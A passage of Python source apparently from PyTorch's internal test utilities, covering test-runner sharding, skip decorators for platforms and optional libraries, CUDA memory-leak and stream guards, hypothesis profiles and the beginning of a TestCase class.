p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
# Used to run the same test with different tensor types
def repeat_test_for_types(dtypes):
def repeat_helper(f):
@wraps(f)
def call_helper(self, *args):
for dtype in dtypes:
with TestCase.subTest(self, dtype=dtype):
f(self, *args, dtype=dtype)
return call_helper
return repeat_helper
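# Hypothetical usage of repeat_test_for_types (dtypes are illustrative, not taken from this file):
#   @repeat_test_for_types([torch.float, torch.double])
#   def test_op(self, dtype=torch.float):
#       ...   # runs once per dtype, each inside its own subTest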
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
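# e.g. chunk_list([1, 2, 3, 4, 5], 2) -> [[1, 3, 5], [2, 4]] (round-robin split)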
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
# inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
if filename.startswith(CI_TEST_PREFIX):
filename = filename[len(CI_TEST_PREFIX) + 1:]
strip_py = re.sub(r'.py$', '', filename)
return re.sub('/', r'.', strip_py)
def run_tests(argv=UNITTEST_ARGS):
# import test files.
if IMPORT_SLOW_TESTS:
if os.path.exists(IMPORT_SLOW_TESTS):
global slow_tests_dict
with open(IMPORT_SLOW_TESTS, 'r') as fp:
slow_tests_dict = json.load(fp)
else:
print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
if IMPORT_DISABLED_TESTS:
if os.path.exists(IMPORT_DISABLED_TESTS):
global disabled_tests_dict
with open(IMPORT_DISABLED_TESTS, 'r') as fp:
disabled_tests_dict = json.load(fp)
else:
print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
# Determine the test launch mechanism
if TEST_DISCOVER:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
elif TEST_IN_SUBPROCESS:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
failed_tests = []
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
exitcode = shell([sys.executable] + argv + [test_case_full_name])
if exitcode != 0:
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner # type: ignore[import]
test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
test_report_path = os.path.join(test_report_path, test_filename)
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
if sys.platform != 'linux':
return False
with open("/proc/cpuinfo", encoding="ascii") as f:
lines = f.read()
return "avx512vnni" in lines
IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
if IS_WINDOWS:
@contextmanager
def TemporaryFileName(*args, **kwargs):
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
if 'delete' in kwargs:
if kwargs['delete'] is not False:
raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
else:
kwargs['delete'] = False
f = tempfile.NamedTemporaryFile(*args, **kwargs)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName(*args, **kwargs):
with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
yield f.name
if IS_WINDOWS:
@contextmanager
def TemporaryDirectoryName(suffix=None):
# On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
# so we first create the directory using mkdtemp and then remove it manually
try:
dir_name = tempfile.mkdtemp(suffix=suffix)
yield dir_name
finally:
shutil.rmtree(dir_name)
else:
@contextmanager # noqa: T484
def TemporaryDirectoryName(suffix=None):
with tempfile.TemporaryDirectory(suffix=suffix) as d:
yield d
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name):
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests are enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.)
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
# Disables noarch tests; all but one CI configuration disables these. We don't
# disable them for local runs because you still want to run them
# (unlike slow tests!)
TEST_SKIP_NOARCH = os.getenv('PYTORCH_TEST_SKIP_NOARCH', '0') == '1'
# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'
# Disables tests for when on Github Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'
# True if CI is running TBB-enabled Pytorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool_ : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
if IS_WINDOWS:
# Size of `np.intc` is platform defined.
# It is returned by functions like `bitwise_not`.
# On Windows `int` is 32-bit
# https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
numpy_to_torch_dtype_dict[np.intc] = torch.int
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
# Skips a test on CUDA if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
def dec_fn(fn):
@wraps(fn)
def wrap_fn(self, *args, **kwargs):
if not TEST_WITH_ROCM:
reason = "ROCm not available"
raise unittest.SkipTest(reason)
rocm_version = str(torch.version.hip)
rocm_version = rocm_version.split("-")[0] # ignore git sha
rocm_version_tuple = tuple(int(x) for x in rocm_version.split("."))
if rocm_version_tuple is None or version is None or rocm_version_tuple < tuple(version):
reason = "ROCm {0} is available but {1} required".format(rocm_version_tuple, version)
raise unittest.SkipTest(reason)
return fn(self, *args, **kwargs)
return wrap_fn
return dec_fn
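# Illustrative usage sketch (hypothetical test method and version tuple): skip a
# TestCase method unless running on ROCm at least as new as the given
# (major, minor) version.
#
#     @skipIfRocmVersionLessThan((4, 3))
#     def test_needs_recent_rocm(self):
#         ...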
def skipIfNotMiopenSuggestNHWC(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
else:
fn(*args, **kwargs)
return wrapper
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
def __init__(self, deterministic):
self.deterministic = deterministic
def __enter__(self):
self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
torch.use_deterministic_algorithms(self.deterministic)
def __exit__(self, exception_type, exception_value, traceback):
torch.use_deterministic_algorithms(self.deterministic_restore)
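# Illustrative usage sketch (added for clarity): code run inside the guard sees
# the requested determinism setting, and the previous setting is restored on exit.
#
#     with DeterministicGuard(True):
#         ...  # torch.are_deterministic_algorithms_enabled() is True here
#     # original setting restored here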
# Context manager for setting cuda sync debug mode and reset it
# to original value
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
def __init__(self, sync_debug_mode):
self.mode = sync_debug_mode
def __enter__(self):
self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
torch.cuda.set_sync_debug_mode(self.mode)
def __exit__(self, exception_type, exception_value, traceback):
torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with DeterministicGuard(torch.are_deterministic_algorithms_enabled()):
class CuBLASConfigGuard:
cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'
def __enter__(self):
self.is_cuda10_2_or_higher = (
(torch.version.cuda is not None)
and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
if self.is_cuda10_2_or_higher:
self.cublas_config_restore = os.environ.get(self.cublas_var_name)
os.environ[self.cublas_var_name] = ':4096:8'
def __exit__(self, exception_type, exception_value, traceback):
if self.is_cuda10_2_or_higher:
cur_cublas_config = os.environ.get(self.cublas_var_name)
if self.cublas_config_restore is None:
if cur_cublas_config is not None:
del os.environ[self.cublas_var_name]
else:
os.environ[self.cublas_var_name] = self.cublas_config_restore
with CuBLASConfigGuard():
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
    This will check if 'MyOp' is registered in `caffe2.python.core._REGISTERED_OPERATORS`.
"""
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def skipIfOnGHA(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if ON_GHA:
raise unittest.SkipTest("Test disabled for GHA")
else:
fn(*args, **kwargs)
return wrapper
def skipIfTBB(message="This test makes TBB sad"):
def dec_fn(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if IS_TBB:
raise unittest.SkipTest(message)
else:
fn(*args, **kwargs)
return wrapper
return dec_fn
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
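# Illustrative usage sketch (hypothetical test): slowTest both tags the method via
# __dict__['slow_test'] and skips it unless PYTORCH_TEST_WITH_SLOW=1 is set.
#
#     @slowTest
#     def test_exhaustive_search(self):
#         ...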
# noarch tests are tests that should only be run on one CI configuration,
# because they don't exercise any interesting platform-specific code,
# so a single passing run indicates the test should pass everywhere.
# See https://github.com/pytorch/pytorch/issues/53743
def noarchTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_SKIP_NOARCH:
raise unittest.SkipTest("test is noarch: we are skipping noarch tests due to TEST_SKIP_NOARCH")
else:
fn(*args, **kwargs)
return wrapper
def slowAwareTest(fn):
fn.__dict__['slow_test'] = True
return fn
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
        if getattr(fn, '_do_cuda_memory_leak_check', True):  # if currently True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
        if getattr(fn, '_do_cuda_non_default_stream', True):  # if currently True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.dtype, obj.dtype)
with torch.no_grad():
res = obj.clone().to(dtype=t, device="cuda")
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
yield
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
try:
yield
finally:
torch.set_default_dtype(saved_dtype)
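# Illustrative usage sketch (added for clarity): the default dtype only changes
# inside the with-block and is restored afterwards, even if the body raises.
#
#     with set_default_dtype(torch.double):
#         t = torch.empty(3)  # t.dtype is torch.float64 here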
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
def is_iterable_of_tensors(iterable, include_empty=False):
""" Returns True if iterable is an iterable of tensors and False o.w.
If the iterable is empty, the return value is :attr:`include_empty`
"""
# Tensor itself is iterable so we check this first
if isinstance(iterable, torch.Tensor):
return False
try:
if len(iterable) == 0:
return include_empty
for t in iter(iterable):
if not isinstance(t, torch.Tensor):
return False
    except TypeError:
return False
return True
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
@staticmethod
def get_cuda_memory_usage():
        # we don't need CUDA synchronize because the statistics are not tracked at
        # actual freeing, but when the block is marked as free.
num_devices = torch.cuda.device_count()
gc.collect()
return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
def __enter__(self):
self.befores = self.get_cuda_memory_usage()
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
afters = self.get_cuda_memory_usage()
for i, (before, after) in enumerate(zip(self.befores, afters)):
self.testcase.assertEqual(
before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
self.name, after - before, i))
@contextmanager
def skip_exception_type(exc_type):
try:
yield
except exc_type as e:
raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
    print('Failed to import hypothesis in common_utils; tests are not derandomized')
def check_if_enable(test: unittest.TestCase):
test_suite = str(test.__class__).split('\'')[1]
test_name = f'{test._testMethodName} ({test_suite})'
if slow_tests_dict is not None and test_name in slow_tests_dict:
getattr(test, test._testMethodName).__dict__['slow_test'] = True
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
if not IS_SANDCASTLE and disabled_tests_dict is not None:
if test_name in disabled_tests_dict:
issue_url, platforms = disabled_tests_dict[test_name]
platform_to_conditional: Dict = {
"mac": IS_MACOS,
"macos": IS_MACOS,
"win": IS_WINDOWS,
"windows": IS_WINDOWS,
"linux": IS_LINUX,
"rocm": TEST_WITH_ROCM
}
if platforms == [] or any([platform_to_conditional[platform] for platform in platforms]):
raise unittest.SkipTest(
f"Test is disabled because an issue exists disabling it: {issue_url}" +
f" for {'all' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " +
"If you're seeing this on your local machine and would like to enable this test, " +
"please make sure IN_CI is not set and you are not using the flag --import-disabled-tests.")
if TEST_SKIP_FAST:
if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# Acquires the comparison dtype, required since isclose
# requires both inputs to have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU nor the CUDA device types
# support the needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support the needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
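# Worked example (added for clarity; values follow torch.promote_types): a bfloat16
# CPU tensor is first remapped to float32, so comparing it against a float64 CPU
# tensor uses promote_types(float32, float64) == float64. Two float16 CPU tensors
# promote to float16, which is then bumped to float32 because both inputs are not
# on CUDA.
#
#     a = torch.tensor([1.0], dtype=torch.bfloat16)  # CPU
#     b = torch.tensor([1.0], dtype=torch.float64)   # CPU
#     get_comparison_dtype(a, b)  # -> torch.float64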
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, so it seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None and issubclass(exc_type, NotImplementedError):
self.test_case.skipTest(f"not_implemented: {exc_value}") # type: ignore[attr-defined]
return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
old_val = torch.is_warn_always_enabled()
torch.set_warn_always(new_val)
try:
yield
finally:
torch.set_warn_always(old_val)
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
# checker to early terminate test suite if unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
# CUDA device side error will cause subsequence test cases to fail.
# stop entire test suite if catches RuntimeError during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
            except RuntimeError:
return True
return False
else:
return False
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
@property
def rel_tol(self) -> float:
return self._rel_tol
@rel_tol.setter
def rel_tol(self, prec: float) -> None:
self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
def wrap_method_with_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
        # NOTE: Python exceptions (e.g., unittest.SkipTest) keep objects in scope
        # alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
def run(self, result=None):
super().run(result=result)
# Early terminate test if necessary.
if self._should_stop_test_suite():
result.stop()
def setUp(self):
check_if_enable(self)
set_rng_seed(SEED)
@staticmethod
def _make_crow_indices(n_rows, n_cols, nnz,
*, device, dtype, random=True):
"""Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
the number of specified elements nnz.
If random is True, the column counts of rows are in random
order. Otherwise, the column counts of rows are defined by the
used sampling method.
Sampling method
---------------
The used sampling method was introduced in
https://pearu.github.io/csr_sampling.html, and here we give
only an overall description of the method.
Notice that crow_indices can be defined as cumsum(counts)
where counts is a sequence of non-negative integers satisfying
the following conditions:
len(counts) == n_rows + 1
counts.max() <= n_cols
while counts[i + 1] is interpreted as the number of specified
elements in the i-th row.
The used sampling method aims at increasing the diversity of
CSR samples, that is, a CSR sample should contain (i) rows
that are all filled, (ii) rows with no elements at all, and
(iii) rows that are partially filled. At the same time and for
the given total number of specified elements (nnz), there
should be minimal preference to rows with a given number of
        elements. To achieve this, the sampling method is built up
        using a sawteeth model for counts. In the simplest case, we
would have
counts = arange(n_rows + 1) % (n_cols + 1)
that has equal number of all possible column counts per row.
This formula can be used only for specific input values of
n_rows, n_cols, and nnz. To generalize this model to any
combinations of inputs, the counts model above is extended
with an incomplete sawtooth, and the right and lower
rectangular parts that will guarantee that
counts.sum() == nnz
for any combination of n_rows, n_cols, and nnz. Basically,
we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
that is able to hold a sequence of sawteeth and so-called
final correction, while the external part of the window is
        filled with counts to meet the nnz constraint exactly.
"""
assert 0 <= nnz <= n_rows * n_cols
def sawteeth(n, m):
# return the total number of counts in the sequence of
# sawteeth where n and m define a window in (n_rows+1,
# n_cols+1) rectangle where the sequence of sawteeth
